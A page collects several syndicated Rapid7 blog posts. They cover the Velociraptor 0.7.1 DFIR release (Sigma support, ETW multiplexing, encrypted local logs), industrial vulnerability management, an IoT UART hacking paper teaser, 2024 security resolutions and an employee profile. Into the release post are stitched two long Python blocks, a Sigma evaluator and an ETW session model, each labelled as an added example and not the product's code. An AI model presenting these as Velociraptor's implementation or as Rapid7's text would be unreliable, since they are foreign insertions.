All posts by Rapid7

Velociraptor 0.7.1 Release: Sigma Support, ETW Multiplexing, Local Encrypted Storage and New VQL Capabilities Highlight the Last Release of 2023

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/29/velociraptor-0-7-1-release-sigma-support-etw-multiplexing-local-encrypted-storage-and-new-vql-capabilities-highlight-the-last-release-of-2023/

Written by Dr. Michael Cohen

Rapid7 is excited to announce that version 0.7.1 of Velociraptor is live and available for download. There are several new features and capabilities that add to the power and efficiency of this open-source digital forensic and incident response (DFIR) platform.

In this post, Rapid7 Digital Paleontologist Dr. Mike Cohen discusses some of the exciting new features.

GUI improvements

The GUI was updated in this release to improve user workflow and accessibility.

Notebook improvements

Velociraptor uses notebooks extensively to facilitate collaboration and post-processing. There are currently three types of notebooks:

  1. Global notebooks – these are available from the GUI sidebar and can be shared with other users for a collaborative workflow.
  2. Collection notebooks – these are attached to specific collections and allow post-processing of the collection results.
  3. Hunt notebooks – these are attached to a hunt and allow post-processing of the collection data from that hunt.

This release further develops the Global notebooks workflow as a central place for collecting and sharing analysis results.

Templated notebooks

Many users rely heavily on notebooks to organize their investigation and to guide other users on what to collect. While Collection notebooks and Hunt notebooks could already include templates, there was no way to customize the default Global notebook.

In this release, we define a new artifact type, NOTEBOOK, which allows a user to define a template for global notebooks.

In this example I will create such a template to help users gather server information about clients. I click on the artifact editor in the sidebar, then select Notebook Templates from the search screen. I then edit the built-in Notebooks.Default artifact.

[Screenshot: Adding a new notebook template]

I can define multiple cells in the notebook. Cells can be of type vql, markdown or vql_suggestion. I usually use the markdown cells to write instructions on how to use my notebook, while vql cells can run queries that, for example, schedule collections or preset hunts.

Next I select Global notebooks in the sidebar and click the New Notebook button. This brings up a wizard that allows me to create a new global notebook. After filling in the name of the notebook and selecting which users to share it with, I can choose the template for this notebook.

[Screenshot: Adding a new notebook template]

I can see my newly added notebook template and select it.

[Screenshot: Viewing the notebook created from the template]

Copying notebook cells

In this release, Velociraptor allows copying of a cell from any notebook to the Global notebooks. This facilitates a workflow where users may filter, post-process and identify interesting artifacts in various hunt notebooks or specific collection notebooks, but then copy the post processed cell into a central Global notebook for collaboration.

For the next example, I collect the server artifact Server.Information.Clients and post process the results in the notebook to count the different clients by OS.

[Screenshot: Post-processing the results of a collection]

Now that I am happy with this query, I want to copy the cell to my Admin Notebook which I created earlier.

[Screenshot: Copying a cell to a global notebook]

I can then select which Global notebook to copy the cell into.

[Screenshot: The copied cell still refers to the original collection]

Velociraptor will copy the cell to the target notebook and add VQL statements to still refer to the original collection. This allows users of the global notebook to further refine the query if needed.

This workflow allows better collaboration between users.

VFS Downloads

Velociraptor’s VFS view is an interactive view of the endpoint’s filesystem. Users can navigate the remote filesystem using a familiar tree-based navigation and interactively fetch various files from the endpoint.

Before the 0.7.1 release, the user was able to download and preview individual files in the GUI but it was difficult to retrieve multiple files downloaded into the VFS.

In the 0.7.1 release, there is a new GUI button to initiate a collection from the VFS itself. This allows the user to download all or only some of the files they had previously interactively downloaded into the VFS.

For example consider the following screenshot that shows a few files downloaded into the VFS.

[Screenshot: Viewing the VFS]

I can initiate a collection from the VFS. This is a server artifact (similar to the usual File Finder artifacts) that simply traverses the VFS with a glob uploading all files into a single collection.

[Screenshot: Initiating a VFS collection]

Using the glob I can choose to retrieve files with a particular filename pattern (e.g. only executables) or all files.

[Screenshot: Inspecting the VFS collection]

Finally the GUI shows a link to the collected flow where I can inspect the files or prepare a download zip just like any other collection.

New VQL plugins and capabilities

This release introduces an exciting new capability: Built-in Sigma Support.

Built-in Sigma Support

Sigma is fast emerging as a popular standard for writing and distributing detections. Sigma was originally designed as a portable notation for multiple backend SIEM products: Detections expressed in Sigma rules can be converted (compiled) into a target SIEM query language (for example into Elastic queries) to run on the target SIEM.

Velociraptor is not really a SIEM in the sense that we do not usually forward all events to a central storage location where large queries can run on it. Instead, Velociraptor’s philosophy is to bring the query to the endpoint itself.

In Velociraptor, Sigma rules can be used directly on the endpoint, without the need to forward all the events off the system first. This makes Sigma a powerful tool for initial triage:

  • Apply a large number of Sigma rules on the local event log files.
  • Those rules that trigger immediately surface potentially malicious activity for further scrutiny.

This can be done quickly and at scale to narrow down on potentially interesting hosts during an IR. A great demonstration of this approach can be seen in the video Live Incident Response with Velociraptor, where Eric Capuano uses the Hayabusa tool deployed via Velociraptor to quickly identify the attack techniques evident on the endpoint.

Previously we could only apply Sigma rules in Velociraptor by bundling the Hayabusa tool, which presents a curated set of Sigma rules but runs locally. In this release Sigma matching is done natively in Velociraptor and therefore the Velociraptor Sigma project simply curates the same rules that Hayabusa curates but does not require the Hayabusa binary itself.

You can read the full Sigma In Velociraptor blog post that describes this feature in great detail, but here I will quickly show how it can be used to great effect.

First I will import the set of curated Sigma rules from the Velociraptor Sigma project by collecting the Server.Import.CuratedSigma server artifact.

[Screenshot: Getting the curated Sigma rules]

This will import a new artifact to my system with up-to-date Sigma rules, divided by status, rule level, etc. For this example I will select the Stable rules at Critical level.

[Screenshot: Collecting Sigma rules from the endpoint]

After launching the collection, the artifact will return all the matching rules and their relevant events. This is a quick artifact taking less than a minute on my test system. I immediately see interesting hits.

[Screenshot: Detecting critical-level rules]

Using Sigma rules for live monitoring

Sigma rules can be used on more than just log files. The Velociraptor Sigma project also provides monitoring rules that can be used on live systems for real time monitoring.

The Velociraptor Hayabusa Live Detection option in the Curated import artifact will import an event monitoring version of the same curated Sigma rules. After adding the rule to the client’s monitoring rules with the GUI, I can receive interesting events for matching rules:

[Screenshot: Live detection of Sigma rules]
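The following is an added example, not Velociraptor's native Sigma engine or code from the Velociraptor Sigma project: a small Python evaluator for the subset of the Sigma detection grammar most rules use (field modifiers contains/startswith/endswith, list values OR-ed, mapping fields AND-ed, and a boolean condition with and/or/not and parentheses). It runs over a constructed rule and constructed Windows service-installation events; the same per-event match serves both the log-file triage described above and the live-monitoring use, where events arrive one at a time.

```python
"""Minimal Sigma evaluator over already-parsed event records. Added example, not
Velociraptor's native engine: the rule is the dict PyYAML would produce from a
rule file, and both the rule and the events are constructed here."""
from __future__ import annotations

import re
from typing import Any

# Constructed rule: a service installed from a user-writable path, unless the
# service name carries a (hypothetical) trusted vendor prefix.
RULE: dict[str, Any] = {
    "title": "Service Installed From User-Writable Path",
    "level": "critical",
    "logsource": {"product": "windows", "service": "system"},
    "detection": {
        "selection": {
            "EventID": 7045,
            "ImagePath|contains": ["\\Temp\\", "\\AppData\\Local\\"],  # a list is OR-ed
        },
        "filter_vendor": {"ServiceName|startswith": "Vendor"},
        "condition": "selection and not filter_vendor",
    },
}

# Constructed events, flattened the way an EVTX parser presents EventData.
EVENTS: list[dict[str, Any]] = [
    {"EventID": 7045, "ServiceName": "upd", "ImagePath": "C:\\Windows\\Temp\\svc.exe"},
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"},
    {"EventID": 7045, "ServiceName": "VendorAgent", "ImagePath": "C:\\Users\\bob\\AppData\\Local\\Vendor\\agent.exe"},
    {"EventID": 4688, "ServiceName": "", "ImagePath": "C:\\Windows\\Temp\\svc.exe"},
]

def _compare(actual: str, expected: str, mods: list[str]) -> bool:
    """Apply Sigma value modifiers; Sigma string matching is case-insensitive."""
    a, e = actual.lower(), expected.lower()
    if "contains" in mods:
        return e in a
    if "startswith" in mods:
        return a.startswith(e)
    if "endswith" in mods:
        return a.endswith(e)
    return a == e

def match_field(spec: str, expected: Any, event: dict[str, Any]) -> bool:
    """'Field|modifier...': one value or a list of values, any of which may match."""
    field, *mods = spec.split("|")
    if event.get(field) is None:
        return False
    values = expected if isinstance(expected, list) else [expected]
    return any(_compare(str(event[field]), str(v), mods) for v in values)

def match_search(search: Any, event: dict[str, Any]) -> bool:
    """A mapping AND-s its fields; a list of mappings is OR-ed."""
    if isinstance(search, list):
        return any(match_search(s, event) for s in search)
    return all(match_field(k, v, event) for k, v in search.items())

def evaluate_condition(condition: str, detection: dict[str, Any], event: dict[str, Any]) -> bool:
    """Recursive descent over search identifiers, and/or/not and parentheses ('or'
    binds loosest). Aggregations such as '1 of selection*' raise ValueError."""
    tokens = re.findall(r"\(|\)|\w+", condition)

    def factor() -> bool:
        tok = tokens.pop(0) if tokens else ""
        if tok == "not":
            return not factor()
        if tok == "(":
            value = expr()
            if not tokens or tokens.pop(0) != ")":
                raise ValueError("unbalanced parenthesis in condition")
            return value
        if tok not in detection:
            raise ValueError(f"unsupported or unknown condition token: {tok!r}")
        return match_search(detection[tok], event)

    def term() -> bool:
        value = factor()
        while tokens and tokens[0] == "and":
            tokens.pop(0)
            value = factor() and value  # parse the right side even if already False
        return value

    def expr() -> bool:
        value = term()
        while tokens and tokens[0] == "or":
            tokens.pop(0)
            value = term() or value
        return value

    result = expr()
    if tokens:
        raise ValueError("trailing tokens in condition")
    return result

def triage(rules: list[dict[str, Any]], events: list[dict[str, Any]]) -> list[tuple[str, str, dict[str, Any]]]:
    """Every (title, level, event) hit, as the triage artifact surfaces them."""
    return [(r["title"], r["level"], e) for r in rules for e in events
            if evaluate_condition(r["detection"]["condition"], r["detection"], e)]
```

Against the constructed events only the service installed from C:\Windows\Temp is reported: the vendor-prefixed service is removed by the filter and the 4688 event never satisfies the selection.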

Other Improvements

SSH/SCP accessor

Velociraptor normally runs on the endpoint and can directly collect evidence from the endpoint. However, many devices on the network cannot install an endpoint agent – either because the operating system is not supported (for example embedded versions of Linux) or due to policy.

When we need to investigate such systems we often can only access them by Secure Shell (SSH). In the 0.7.1 release, Velociraptor has an ssh accessor which allows all plugins that normally use the filesystem to transparently use SSH instead.

For example, consider the glob() plugin which searches for files.

[Screenshot: Globbing for files over SSH]

We can specify that glob() use the ssh accessor to access the remote system. By setting the SSH_CONFIG VQL variable, the accessor uses the locally stored private key to authenticate with the remote system and access its files.

We can combine this new accessor with the remapping feature to reconfigure the VQL engine to substitute the ssh accessor for the auto accessor whenever any plugin attempts to access files. This allows us to run the same artifacts that would normally access files locally, but have them transparently read those files over SSH instead:

[Screenshot: Remapping the auto accessor to ssh]

This example shows how to use the SSH accessor to investigate a Debian system and collect the Linux.Debian.Packages artifact from it over SSH.

Distributed notebook processing

While Velociraptor is very efficient and fast, and can support a large number of endpoints connected to the server, many users told us that on busy servers, running notebook queries can affect server performance. This is because a notebook query can be quite intensive (e.g. sorting or grouping a large data set), and in the default configuration the same server is collecting data from clients, performing hunts, and also running the notebook queries.

This release allows notebook processors to run in another process. In Multi-Frontend configurations (also called Master/Minion configurations), the Minion nodes will now offer to perform notebook queries away from the master node. This allows this sudden workload to be distributed to other nodes in the cluster and improves server and GUI performance.

ETW Multiplexing

Previous support for Event Tracing for Windows (ETW) was rudimentary. Each query that called the watch_etw() plugin to receive the event stream from a particular provider created a new ETW session. Since the total number of ETW sessions on the system is limited to 64, this consumed precious resources.

In 0.7.1 the ETW subsystem was overhauled with the ability to multiplex many ETW watchers on top of the same session. The ETW sessions are created and destroyed on demand. This allows us to more efficiently track many more ETW providers with minimal impact on the system.

Additionally, the etw_sessions() plugin can show statistics for all sessions currently running, including the number of dropped events.
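As an added illustration (not Velociraptor's Go implementation, and it does not open real ETW sessions), the following Python models the bookkeeping just described: sessions are keyed by provider, created on demand, released when their last watcher leaves, capped at the 64-session limit, and report per-session dropped-event counts in the spirit of etw_sessions(). Provider names and queue sizes are constructed, and multiplex=False reproduces the pre-0.7.1 one-session-per-query behaviour for comparison.

```python
"""Model of ETW session multiplexing: many watchers share one session per provider.
Added example of the bookkeeping only; it is not Velociraptor's Go code and does
not talk to ETW. Provider names and queue limits are constructed."""
from __future__ import annotations

import threading
from typing import Any

MAX_ETW_SESSIONS = 64  # the system-wide session limit the post refers to

class SessionLimitError(RuntimeError):
    """Raised when creating another ETW session would exceed the system limit."""

class _Session:
    """One simulated ETW session: a provider plus a queue per subscribed watcher."""

    def __init__(self, provider: str) -> None:
        self.provider = provider
        self.queues: dict[int, list[dict[str, Any]]] = {}
        self.dropped = 0  # events a slow watcher could not accept

    def publish(self, event: dict[str, Any], max_queue: int) -> None:
        for queue in self.queues.values():
            if len(queue) >= max_queue:
                self.dropped += 1
            else:
                queue.append(event)

class EtwSessions:
    """Sessions are created on demand and torn down when their last watcher leaves.
    multiplex=True: one session per provider shared by all watchers (0.7.1).
    multiplex=False: one session per watcher, the pre-0.7.1 behaviour."""

    def __init__(self, multiplex: bool = True, limit: int = MAX_ETW_SESSIONS,
                 max_queue: int = 1000) -> None:
        self._lock = threading.Lock()
        self._sessions: dict[str, _Session] = {}
        self._owner: dict[int, str] = {}  # watcher id -> session key
        self._next_id = 0
        self.multiplex, self.limit, self.max_queue = multiplex, limit, max_queue

    def watch(self, provider: str) -> int:
        """Subscribe a watcher to a provider and return its watcher id."""
        with self._lock:
            wid, self._next_id = self._next_id, self._next_id + 1
            key = provider if self.multiplex else f"{provider}#{wid}"
            session = self._sessions.get(key)
            if session is None:
                if len(self._sessions) >= self.limit:
                    raise SessionLimitError(f"{self.limit} ETW sessions already in use")
                session = self._sessions[key] = _Session(provider)
            session.queues[wid] = []
            self._owner[wid] = key
            return wid

    def unwatch(self, wid: int) -> None:
        """Drop a watcher; the session is released once no watcher remains."""
        with self._lock:
            key = self._owner.pop(wid)
            session = self._sessions[key]
            del session.queues[wid]
            if not session.queues:
                del self._sessions[key]

    def publish(self, provider: str, event: dict[str, Any]) -> None:
        """Fan an event from a provider out to every session watching it."""
        with self._lock:
            for session in self._sessions.values():
                if session.provider == provider:
                    session.publish(event, self.max_queue)

    def read(self, wid: int) -> list[dict[str, Any]]:
        """Drain and return the events queued for one watcher."""
        with self._lock:
            queue = self._sessions[self._owner[wid]].queues[wid]
            events, queue[:] = list(queue), []
            return events

    def session_count(self) -> int:
        with self._lock:
            return len(self._sessions)

    def stats(self) -> list[dict[str, Any]]:
        """Per-session statistics, in the spirit of the etw_sessions() plugin."""
        with self._lock:
            return [{"provider": s.provider, "watchers": len(s.queues), "dropped": s.dropped}
                    for s in self._sessions.values()]

def sessions_needed(watchers_per_provider: int, providers: list[str], multiplex: bool) -> int:
    """Sessions consumed by N watchers on each provider; raises past the 64 limit."""
    pool = EtwSessions(multiplex=multiplex)
    for provider in providers:
        for _ in range(watchers_per_provider):
            pool.watch(provider)
    return pool.session_count()
```

With 30 queries on each of three providers the multiplexed pool uses three sessions, while the one-session-per-query model hits the 64-session limit on the 65th query.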

Artifacts can be hidden in the GUI

Velociraptor comes with a large number of built-in artifacts. This can be confusing for new users, and admins may want to hide artifacts in the GUI.

You can now hide an artifact from the GUI using the artifact_set_metadata() VQL function. For example the following query will hide all artifacts which do not have Linux in their name.

[Screenshot: Hiding artifacts with artifact_set_metadata()]

Only Linux related artifacts will now be visible in the GUI.

[Screenshot: Hiding artifacts from the GUI]

Local encrypted storage for clients

It is sometimes useful to write data locally on endpoints instead of transferring the data to the server. For example, if the client is not connected to the internet for long periods it is useful to write data locally. It is also useful to keep a local copy of data that we may want to recover later during an investigation.

The downside of writing data locally on the endpoints is that this data may be accessed if the endpoint is later compromised. If the data contains sensitive information this can be used by an attacker. This is also primarily the reason that Velociraptor does not write a log file on the endpoint. Unfortunately this makes it difficult to debug issues.

The 0.7.1 release introduces a secure local log file format. This allows the Velociraptor client to write to the local disk in a secure way. Once written the data can only be decrypted by the server.

While any data can be written to the encrypted local file, the Generic.Client.LocalLogs artifact allows Velociraptor client logs to be written at runtime.

[Screenshot: Writing local logs]

To read these locally stored logs I can fetch them using the Generic.Client.LocalLogsRetrieve artifact to retrieve the encrypted local file. The file is encrypted using the server’s public key and can only be decrypted on the server.

[Screenshot: Inspecting the uploaded encrypted local file]

Once on the server, I can decrypt the file using the collection’s notebook which automatically decrypts the uploaded file.

[Screenshot: Decrypting the encrypted local file]

Conclusions

There are many more new features and bug fixes in the 0.7.1 release. If you’re interested in any of these new features, we welcome you to take Velociraptor for a spin by downloading it from our release page. It’s available for free on GitHub under an open-source license.

As always, please file bugs on the GitHub issue tracker or submit questions to our mailing list by emailing [email protected]. You can also chat with us directly on our Discord server.

Learn more about Velociraptor by visiting any of our web and social media channels below:

Mastering Industrial Cybersecurity: The Significance of Combining Vulnerability Management with Detection and Response

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/28/mastering-industrial-cybersecurity-the-significance-of-combining-vulnerability-management-with-detection-and-response/

Written by Elad Ben-Meir, CEO SCADAfence, a Honeywell company.

In today’s digital era, where industries are increasingly reliant on advanced technologies, safeguarding critical infrastructure against cyber threats has become paramount. The convergence of operational technology (OT) and information technology (IT) has ushered in new efficiencies but has also exposed vulnerabilities. This article explores the pivotal role of Vulnerability Management and Detection and Response (VM/DR) in the realm of Industrial Cybersecurity.

Introduction to Industrial Cybersecurity

In an interconnected world, the importance of cybersecurity cannot be overstated. In industrial settings, where the consequences of cyberattacks can extend beyond data breaches to impact physical safety and operational continuity, cybersecurity is a top priority. This article delves into the significance of VM/DR in fortifying industrial cybersecurity defenses.

Vulnerability Management and Detection and Response (VM/DR) in Industrial Context

VM/DR is not a mere buzzword but a proactive strategy to combat the ever-evolving cyber threats facing industrial organizations, which must also contend with the small talent pool from which they hire. It entails continuous monitoring, rapid threat detection, and efficient incident response, while understanding the industrial processes these technologies control. In the context of industrial operations, VM/DR takes on added significance as it safeguards critical processes from disruption.

The Core Components of Industrial VM/DR

A successful VM/DR program in an industrial setting comprises several key components:

  • Real-time threat monitoring: This involves continuous surveillance of network traffic and system activities to detect anomalies and potential threats.
  • Incident detection and analysis: Rapid identification and thorough analysis of security incidents are crucial for timely response and mitigation.
  • Incident response and remediation: An effective response strategy is vital to minimize the impact of cyber incidents and promptly restore normal operations.

These components work in tandem to provide a comprehensive security shield against industrial cyber threats.

Utilizing SCADAfence’s real-time passive threat monitoring alongside Rapid7’s InsightVM and InsightIDR products allows for industrial-focused threats to be detected, analyzed, responded to, and remediated in a timely manner.

Industrial-Specific Threats and Vulnerabilities

In the industrial landscape, cyber threats go beyond traditional IT concerns. Attack vectors extend to Industrial Control Systems (ICS), which govern critical processes. Vulnerabilities unique to OT systems, such as legacy equipment and proprietary protocols, pose additional challenges. Understanding these threats is essential for effective protection.

The Landscape of Industrial Threats and Vulnerabilities

Industrial systems are the backbone of modern society, controlling everything from power grids to manufacturing processes. With connectivity becoming ubiquitous, these systems have become prime targets for malicious actors.

Reference: According to a report by IBM X-Force, attacks on industrial systems increased by over 2000% in 2020, highlighting the growing threat landscape in the industrial sector.

Legacy Systems and Proprietary Protocols

Many industrial environments still rely on legacy systems that were not designed with modern cybersecurity in mind. These aging systems often run on proprietary protocols, making them vulnerable to exploitation.

Reference: The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has noted an increase in vulnerabilities related to legacy systems and proprietary protocols in their annual reports.

Human Error and Insider Threats

Human error remains a significant factor in industrial incidents. Insider threats, whether intentional or unintentional, can have catastrophic consequences in industrial settings.

Reference: A study by Ponemon Institute found that 57% of industrial organizations surveyed had experienced at least one insider threat incident in the past year.

Supply Chain Vulnerabilities

Industrial systems rely on a complex network of suppliers and vendors. Weak links in the supply chain can introduce vulnerabilities that adversaries could exploit.

Reference: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued alerts about supply chain vulnerabilities in industrial control systems.

IoT and Edge Devices

The proliferation of Internet of Things (IoT) devices and edge computing has expanded the attack surface in industrial environments. These devices are often inadequately secured.

Reference: A report from Kaspersky highlights a 46% increase in attacks on IoT devices in the first half of 2020, with many incidents affecting industrial sectors.

Ransomware Targeting Critical Infrastructure

Ransomware attacks have evolved to target critical infrastructure, disrupting essential services and demanding hefty ransoms.

Reference: The Colonial Pipeline ransomware attack in May 2021 brought widespread attention to the threat of ransomware against critical infrastructure.

Integration with Existing Workflows/Playbooks

VM/DR is not a standalone solution but a complement to existing industrial workflows and/or playbooks. It bridges the gap between IT and OT, breaking down silos that often hinder effective cybersecurity. By integrating VM/DR seamlessly into existing processes, organizations can enhance their ability to promptly respond to threats. Having detailed playbooks with key operational Points of Contact (POC) helps to reduce dead time when dealing with a business and process interruption inside of an industrial process.

Implementing response and action plans within the current organization’s workflows helps analysts better communicate in the operational verbiage and expedites remediations directly in the field. This alleviates IT’s need for Confidentiality, Integrity, and Availability (CIA) and supports OT’s requirements for Availability, Integrity, Confidentiality (AIC).

Measuring Success with Key Performance Indicators (KPIs)

Success in industrial VM/DR can be quantified through various KPIs:

  • Time to Detect (TTD): The speed at which threats are identified
  • Time to Respond (TTR): The efficiency of incident response
  • Incident Resolution Rate: The effectiveness of mitigation efforts

These KPIs provide a tangible measure of an organization’s cybersecurity resilience.

Collaboration between IT and OT

The collaboration between IT and OT teams is pivotal in industrial cybersecurity. VM/DR serves as a unifying force, facilitating communication and coordination between these traditionally separate domains. This collaboration is vital for the timely identification and mitigation of threats.

Compliance and Regulatory Considerations

Industrial organizations are subject to various cybersecurity regulations and standards such as the North American Electric Reliability Corporation Critical Infrastructure Protection (NERC CIP). NERC CIP regulatory compliance is a set of mandatory cybersecurity standards and requirements designed to safeguard the North American power grid’s critical infrastructure.

These regulations are a response to the increasing cybersecurity threats faced by the energy sector. NERC CIP compliance mandates that electric utilities and power generation companies establish and maintain robust cybersecurity programs, including measures such as access controls, incident response planning, and regular security assessments. The primary goal of NERC CIP is to ensure the reliable operation of the electric grid while minimizing vulnerabilities to cyberattacks, thus safeguarding the continuous supply of electricity to homes, businesses, and critical infrastructure across North America. Compliance with NERC CIP is essential to maintain the security and resilience of the energy sector in the face of evolving cybersecurity threats.

Implementing a compliance governance portal is a strategic move for organizations seeking to streamline and centralize their compliance management efforts. Such a portal serves as a centralized platform where compliance policies, procedures, and documentation can be efficiently stored, accessed, and monitored. It facilitates real-time tracking of compliance activities, automates workflow processes, and provides a comprehensive view of the organization’s adherence to regulatory requirements.

This not only enhances transparency and accountability but also simplifies reporting and auditing. The implementation of a compliance governance portal empowers organizations to proactively manage risk, ensure regulatory adherence, and respond swiftly to compliance-related challenges, ultimately fostering a culture of compliance throughout the organization. VM/DR plays a crucial role in helping organizations meet compliance requirements, providing assurance to regulators and stakeholders.

Securing the Future

In the face of relentless cyber threats, mastering industrial cybersecurity is not a luxury – it’s a necessity. VM/DR is the linchpin that empowers organizations to fortify their defenses, protect critical infrastructure, and ensure operational continuity in an increasingly digital world.

As digital transformation continues, industrial VM/DR represents a proactive, adaptive, and collaborative approach to safeguarding the backbone of our society. It’s time for industrial organizations to embrace VM/DR and secure their future.

There’s One Last Gift Under the Tree, It’s Hands-On IoT!

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/27/theres-one-last-gift-under-the-tree-its-hands-on-iot/

It’s the holiday season and since we’re in a giving mood we thought we’d surprise our loyal readers with a fun, hands-on hardware exercise to enjoy during some well-earned downtime.

But first, a little background. Every year Rapid7 has a pretty solid presence at DefCon in Las Vegas. This year was no exception. One of the cornerstones of our DefCon experience is participating in the IoT Village. Deral Heiland, our Principal Security Researcher for IoT, takes attendees through each of the steps of breaking into a particular piece of IoT hardware. And every year we release his talk (with a few additions) for those who couldn’t make it to Vegas for the conference.

What we have here is this year’s Hands-On IoT presentation on the hacking of an IP camera over Universal Asynchronous Receiver/Transmitter (UART). It’s Deral’s original presentation with some added details and context. In this paper, Deral takes you step by step through the process, offering insight into how UART and U-Boot operate, as well as some troubleshooting techniques should your attempts not work as seamlessly as Deral’s.

Typically, we would release Deral’s presentation in a series of blog posts over a few weeks. But this year we decided to spare y’all the suspense each week and release it as one comprehensive paper. We hope you enjoy reading it as much as we enjoyed making it and we wish you all the best this holiday season.

Click here to download the paper.

We Asked ChatGPT for 2024 Cybersecurity Predictions but You Should Make These Resolutions Instead

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/18/we-asked-chatgpt-for-2024-cybersecurity-predictions-but-you-should-make-these-resolutions-instead/

By Caitlin Condon, Senior Manager, Vulnerability Research at Rapid7, and Christiaan Beek, Senior Director, Threat Analytics at Rapid7

It’s that time of year again — time for the annual tradition of cybersecurity predictions. Here at Rapid7 we’ve seen a whole lot of threats and exploited vulnerabilities in 2023, many in the form of zero days. So it can be a little overwhelming to think about what could be in store for us in the year ahead.

We thought we’d start off by asking ChatGPT for its predictions.

Unsurprisingly, it gave the answer, “increased emphasis on AI and machine learning.” ChatGPT explained that AI-driven systems can better analyze and detect anomalies, and that we may see even more AI-powered tools for threat detection, response, and automation.

Well, there you have it folks, ChatGPT TO THE RESCUE!

This “prediction” is pretty obvious, and everyone in the cybersecurity industry knows it. But more importantly, it doesn’t solve the huge issue that exists in the cybersecurity industry: We’re all focusing on what could be without having the basic mechanisms in place to address what is.

So instead of making 2024 cybersecurity predictions, we suggest you make the following three resolutions and a promise to yourself that you will lay the groundwork to make them happen in 2024.

Resolution 1: Just implement MFA already

It seems like every CISO has spent 2023 getting up to speed on AI. Certainly AI will play an important role in 2024, both in the opportunities it presents to defenders as well as the security challenges it brings.

From a cybersecurity standpoint, however, it’s still important to keep your business focused on the basics such as correctly implemented multi-factor authentication (MFA). That’s because in 2024, a business is significantly more likely to be breached due to weak MFA than it is by an advanced-AI cyber attack.

Our 2023 Mid-Year Threat Report found that 40% of incidents in the first half of the year stemmed from non-existent or poorly enforced MFA. Our message is simple: implement MFA now, particularly for VPNs and virtual desktop infrastructure. It’s the best and most important accomplishment you can make if you haven’t yet done so.

Resolution 2: Learn from what file transfer vendors did right

Without a doubt, 2023 was the year of file transfer vulnerabilities, with MOVEit Transfer dominating headlines. However, we expect 2024 to be slightly different based on our experience with these vendors’ response processes.

The file transfer software providers Rapid7 researchers disclosed vulnerabilities to were extremely responsive, fixing vulnerabilities in half the time it usually takes and proactively looking at ways to mature their vulnerability disclosure programs.

In fact, some of these organizations now have more established patch cycles and vulnerability disclosure mechanisms in place (hooray!), as well as security programs implemented where products are reviewed more frequently. These proactive cycles should result in more mature, security-bolstering software development practices — at least for these solution providers and those who have learned from them — in 2024.

Resolution 3: Get a grip on your data

Lots of data does not equal effective security analysis. We all get fatigued and miss things when we feel overwhelmed and overstretched. And well, the same happens to security teams when they are just given enormous amounts of raw data. Context is everything! It’s the missing piece of the puzzle to improving security posture and the effectiveness of solutions.

Spending more money or gathering more data is not going to improve your cybersecurity posture, but understanding data and, more importantly, what kind of data is needed to make better decisions will. Less is more is our credo for 2024. For example, take time to understand what data you are already collecting from a log perspective. Understand what type of data is inside those logs and how that data might indicate a possible attack technique. If you have only part of the right information, what additional data would you need to enrich it with enough context to decide on or prioritize events?

Bonus: Take some time to decompress

Trust us, we know that for defenders taking time to decompress is easier said than done, but it’s so important to look after ourselves and avoid burnout. Our advice to you is to put your coverage plan in place, communicate it well, and most importantly, take the time you need. Even Gartner has predicted that 25% of cybersecurity leaders will change roles entirely by 2025 due to work-related stress. So, make sure you take the time to decompress, relax, and enjoy life.

For insights from the Rapid7 team on what 2024 could bring, watch the Top Cybersecurity Predictions webinar on-demand.

Living our Values and Leveraging Diverse Skill Sets: How Jonathan Atwood Built a Successful Career as a Customer Advisor at Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/12/11/living-our-values-and-leveraging-diverse-skill-sets-how-jonathan-atwood-built-a-successful-career-as-a-customer-advisor-at-rapid7/

Living our Values and Leveraging Diverse Skill Sets: How Jonathan Atwood Built a Successful Career as a Customer Advisor at Rapid7

At Rapid7, our Customer Advisors play a pivotal role in ensuring our customers understand their threat landscape – and feel confident in their security programs. By collaborating across various internal teams, strengthening customer relationships, and proactively seeking solutions and advocating for customer needs, Customer Advisors have a direct impact on the fortunes of our business. Doing this successfully requires a clear understanding of Rapid7’s core values and associated behaviors as well as an equal balance of strong technical knowledge and exceptional customer relationship skills.

Jonathan: “You need to create a strong relationship with customers to fully understand their needs and their business. You also have to be able to talk in detail about very technical scenarios. This requires having some experience or education in the cybersecurity field as well as the ability to relay information to our engineers and developers. Customers are extremely aware of the potential risks a security event may pose to their businesses, so it’s important their questions are answered in detail. This enables a clear understanding of what is happening in their environments.”

In addition to presenting and reviewing activity reports, Customer Advisors like Jonathan take a proactive approach to providing guidance and advice on all aspects of a customer’s security ecosystem.

Jonathan: “I may be asked to advise on reviewing the results of a recent pen test, break down a bug or issue with a particular piece of code, or speak up if there is a storage container system they are using that I wouldn’t agree with or recommend.”

Jonathan also notes that the requirements for each customer can also vary depending on industry or field, based on specific security frameworks that may be in place that govern how they do business. Understanding these requirements helps provide additional guidance and shape recommendations for the unique needs of individual customers.

Jonathan: “HIPAA is a common example of a security framework. So if I have a customer who is in the medical field, I’m also thinking of the regulations in place for protecting patient health information and how to best advise them based on those specific requirements.”

While the role is dynamic and requires a wide range of skills to be successful, Jonathan says it’s the ability to see the impact of his work that he finds most rewarding.

Jonathan: “I’ve always had an aspiration to help people. In this role, I can feel the impact my work has on the customer as well as internally at Rapid7. When I have provided the right guidance and solutions and they are happy with our services, that leads to customer renewals and helps you feel like you’re contributing directly to the success of the business.”

The responsibility for cultivating relationships isn’t limited to external customers. For Jonathan, building internal relationships helps him drive positive impact in his role and for his own development and growth.

Jonathan: “Collaboration is a huge part of Rapid7’s culture. You should never be afraid of reaching out to ask a question or to raise your hand if you need help. Any time I’ve reached out to someone with a question – whether it was big or small, in a team chat or a 1:1 conversation, everyone has always been willing to jump in and help.

“We talk a lot about our values as a company, and when it comes to those Rapid7 core values like Advocating for Customers, Challenging Convention, and Impacting Together, we all understand that having these conversations helps get us to the best possible outcome. Additionally, the events the company hosts to bring people from different teams together are helpful in understanding how different teams operate and how you might eventually partner together in the future.”

An emphasis on collaboration and a deep dive of Rapid7’s core values are key elements of a new hire’s global onboarding program. The current program combines a mix of company education (culture, values, benefits processes, etc.) with programs specific to each person’s role or team.

